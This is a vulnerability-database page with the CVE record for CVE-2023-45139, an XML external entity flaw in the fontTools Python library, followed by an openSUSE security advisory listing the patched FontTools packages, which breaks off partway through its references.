Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2023-45139 (GCVE-0-2023-45139)
Vulnerability from cvelistv5
- CWE-611 - Improper Restriction of XML External Entity Reference
 
{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T20:14:19.258Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
          },
          {
            "name": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
          },
          {
            "name": "https://github.com/fonttools/fonttools/releases/tag/4.43.0",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/03/09/1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/03/08/2"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-45139",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-08T18:37:10.491503Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-06-03T14:27:45.728Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fonttools",
          "vendor": "fonttools",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 4.28.2, \u003c 4.43.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-611",
              "description": "CWE-611: Improper Restriction of XML External Entity Reference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-01T18:06:54.318Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
        },
        {
          "name": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
        },
        {
          "name": "https://github.com/fonttools/fonttools/releases/tag/4.43.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/03/09/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/03/08/2"
        }
      ],
      "source": {
        "advisory": "GHSA-6673-4983-2vx5",
        "discovery": "UNKNOWN"
      },
      "title": "fonttools XML External Entity Injection (XXE) Vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-45139",
    "datePublished": "2024-01-10T16:03:08.770Z",
    "dateReserved": "2023-10-04T16:02:46.329Z",
    "dateUpdated": "2025-06-03T14:27:45.728Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-45139\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-01-10T16:15:46.767\",\"lastModified\":\"2024-11-21T08:26:25.513\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0.\"},{\"lang\":\"es\",\"value\":\"fontTools es una librer\u00eda para manipular fuentes, escrita en Python. El m\u00f3dulo subsetting tiene una vulnerabilidad de inyecci\u00f3n de entidades externas XML (XXE) que permite a un atacante resolver entidades arbitrarias cuando se analiza una fuente candidata (fuentes OT-SVG), que contiene una tabla SVG. Esto permite a los atacantes incluir archivos arbitrarios del sistema de archivos en el que se ejecuta fontTools o realizar solicitudes web desde el sistema host. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 4.43.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-611\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:fonttools:fonttools:*:*:*:*:*:python:*:*\",\"versionStartIncluding\":\"4.28.2\",\"versionEndExcluding\":\"4.43.0\",\"matchCriteriaId\":\"CA51147F-FB56-471F-AA46-967C55F0AE97\"}]}]}],\"references\":[{\"url\":\"http://www.openwall.com/lists/oss-security/2024/03/08/2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"http://www.openwall.com/lists/oss-security/2024/03/09/1\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/fonttools/fonttools/releases/tag/4.43.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/\",\"source\":\"security-advisories@github.com\"},{\"url\":\"http://www.openwall.com/lists/oss-security/2024/03/08/2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.openwall.com/lists/oss-security/2024/03/09/1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/fonttools/fonttools/releases/tag/4.43.0\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5\", \"name\": \"https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c\", \"name\": \"https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/fonttools/fonttools/releases/tag/4.43.0\", \"name\": \"https://github.com/fonttools/fonttools/releases/tag/4.43.0\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/\", \"tags\": [\"x_transferred\"]}, {\"url\": \"http://www.openwall.com/lists/oss-security/2024/03/09/1\", \"tags\": [\"x_transferred\"]}, {\"url\": \"http://www.openwall.com/lists/oss-security/2024/03/08/2\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T20:14:19.258Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-45139\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-05-08T18:37:10.491503Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-05-08T18:37:11.985Z\"}}], \"cna\": {\"title\": \"fonttools XML External Entity Injection (XXE) Vulnerability\", \"source\": {\"advisory\": \"GHSA-6673-4983-2vx5\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"fonttools\", \"product\": \"fonttools\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.28.2, \u003c 4.43.0\"}]}], \"references\": [{\"url\": \"https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5\", \"name\": \"https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c\", \"name\": \"https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/fonttools/fonttools/releases/tag/4.43.0\", \"name\": \"https://github.com/fonttools/fonttools/releases/tag/4.43.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/\"}, {\"url\": \"http://www.openwall.com/lists/oss-security/2024/03/09/1\"}, {\"url\": \"http://www.openwall.com/lists/oss-security/2024/03/08/2\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-611\", \"description\": \"CWE-611: Improper Restriction of XML External Entity Reference\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-05-01T18:06:54.318Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-45139\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-06-03T14:27:45.728Z\", \"dateReserved\": \"2023-10-04T16:02:46.329Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-01-10T16:03:08.770Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}
  opensuse-su-2024:13686-1
Vulnerability from csaf_opensuse
Notes
{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python310-FontTools-4.47.2-2.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python310-FontTools-4.47.2-2.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2024-13686",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13686-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2023-45139 page",
        "url": "https://www.suse.com/security/cve/CVE-2023-45139/"
      }
    ],
    "title": "python310-FontTools-4.47.2-2.1 on GA media",
    "tracking": {
      "current_release_date": "2024-06-15T00:00:00Z",
      "generator": {
        "date": "2024-06-15T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2024:13686-1",
      "initial_release_date": "2024-06-15T00:00:00Z",
      "revision_history": [
        {
          "date": "2024-06-15T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-FontTools-4.47.2-2.1.aarch64",
                "product": {
                  "name": "python310-FontTools-4.47.2-2.1.aarch64",
                  "product_id": "python310-FontTools-4.47.2-2.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-FontTools-4.47.2-2.1.aarch64",
                "product": {
                  "name": "python311-FontTools-4.47.2-2.1.aarch64",
                  "product_id": "python311-FontTools-4.47.2-2.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-FontTools-4.47.2-2.1.aarch64",
                "product": {
                  "name": "python312-FontTools-4.47.2-2.1.aarch64",
                  "product_id": "python312-FontTools-4.47.2-2.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python39-FontTools-4.47.2-2.1.aarch64",
                "product": {
                  "name": "python39-FontTools-4.47.2-2.1.aarch64",
                  "product_id": "python39-FontTools-4.47.2-2.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-FontTools-4.47.2-2.1.ppc64le",
                "product": {
                  "name": "python310-FontTools-4.47.2-2.1.ppc64le",
                  "product_id": "python310-FontTools-4.47.2-2.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python311-FontTools-4.47.2-2.1.ppc64le",
                "product": {
                  "name": "python311-FontTools-4.47.2-2.1.ppc64le",
                  "product_id": "python311-FontTools-4.47.2-2.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python312-FontTools-4.47.2-2.1.ppc64le",
                "product": {
                  "name": "python312-FontTools-4.47.2-2.1.ppc64le",
                  "product_id": "python312-FontTools-4.47.2-2.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python39-FontTools-4.47.2-2.1.ppc64le",
                "product": {
                  "name": "python39-FontTools-4.47.2-2.1.ppc64le",
                  "product_id": "python39-FontTools-4.47.2-2.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-FontTools-4.47.2-2.1.s390x",
                "product": {
                  "name": "python310-FontTools-4.47.2-2.1.s390x",
                  "product_id": "python310-FontTools-4.47.2-2.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python311-FontTools-4.47.2-2.1.s390x",
                "product": {
                  "name": "python311-FontTools-4.47.2-2.1.s390x",
                  "product_id": "python311-FontTools-4.47.2-2.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python312-FontTools-4.47.2-2.1.s390x",
                "product": {
                  "name": "python312-FontTools-4.47.2-2.1.s390x",
                  "product_id": "python312-FontTools-4.47.2-2.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python39-FontTools-4.47.2-2.1.s390x",
                "product": {
                  "name": "python39-FontTools-4.47.2-2.1.s390x",
                  "product_id": "python39-FontTools-4.47.2-2.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-FontTools-4.47.2-2.1.x86_64",
                "product": {
                  "name": "python310-FontTools-4.47.2-2.1.x86_64",
                  "product_id": "python310-FontTools-4.47.2-2.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-FontTools-4.47.2-2.1.x86_64",
                "product": {
                  "name": "python311-FontTools-4.47.2-2.1.x86_64",
                  "product_id": "python311-FontTools-4.47.2-2.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-FontTools-4.47.2-2.1.x86_64",
                "product": {
                  "name": "python312-FontTools-4.47.2-2.1.x86_64",
                  "product_id": "python312-FontTools-4.47.2-2.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python39-FontTools-4.47.2-2.1.x86_64",
                "product": {
                  "name": "python39-FontTools-4.47.2-2.1.x86_64",
                  "product_id": "python39-FontTools-4.47.2-2.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-FontTools-4.47.2-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.aarch64"
        },
        "product_reference": "python310-FontTools-4.47.2-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-FontTools-4.47.2-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.ppc64le"
        },
        "product_reference": "python310-FontTools-4.47.2-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-FontTools-4.47.2-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.s390x"
        },
        "product_reference": "python310-FontTools-4.47.2-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-FontTools-4.47.2-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.x86_64"
        },
        "product_reference": "python310-FontTools-4.47.2-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-FontTools-4.47.2-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.aarch64"
        },
        "product_reference": "python311-FontTools-4.47.2-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-FontTools-4.47.2-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.ppc64le"
        },
        "product_reference": "python311-FontTools-4.47.2-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-FontTools-4.47.2-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.s390x"
        },
        "product_reference": "python311-FontTools-4.47.2-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-FontTools-4.47.2-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.x86_64"
        },
        "product_reference": "python311-FontTools-4.47.2-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-FontTools-4.47.2-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.aarch64"
        },
        "product_reference": "python312-FontTools-4.47.2-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-FontTools-4.47.2-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.ppc64le"
        },
        "product_reference": "python312-FontTools-4.47.2-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-FontTools-4.47.2-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.s390x"
        },
        "product_reference": "python312-FontTools-4.47.2-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-FontTools-4.47.2-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.x86_64"
        },
        "product_reference": "python312-FontTools-4.47.2-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-FontTools-4.47.2-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.aarch64"
        },
        "product_reference": "python39-FontTools-4.47.2-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-FontTools-4.47.2-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.ppc64le"
        },
        "product_reference": "python39-FontTools-4.47.2-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-FontTools-4.47.2-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.s390x"
        },
        "product_reference": "python39-FontTools-4.47.2-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-FontTools-4.47.2-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.x86_64"
        },
        "product_reference": "python39-FontTools-4.47.2-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2023-45139",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2023-45139"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.aarch64",
          "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.ppc64le",
          "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.s390x",
          "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.x86_64",
          "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.aarch64",
          "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.ppc64le",
          "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.s390x",
          "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.x86_64",
          "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.aarch64",
          "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.ppc64le",
          "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.s390x",
          "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.x86_64",
          "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.aarch64",
          "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.ppc64le",
          "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.s390x",
          "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
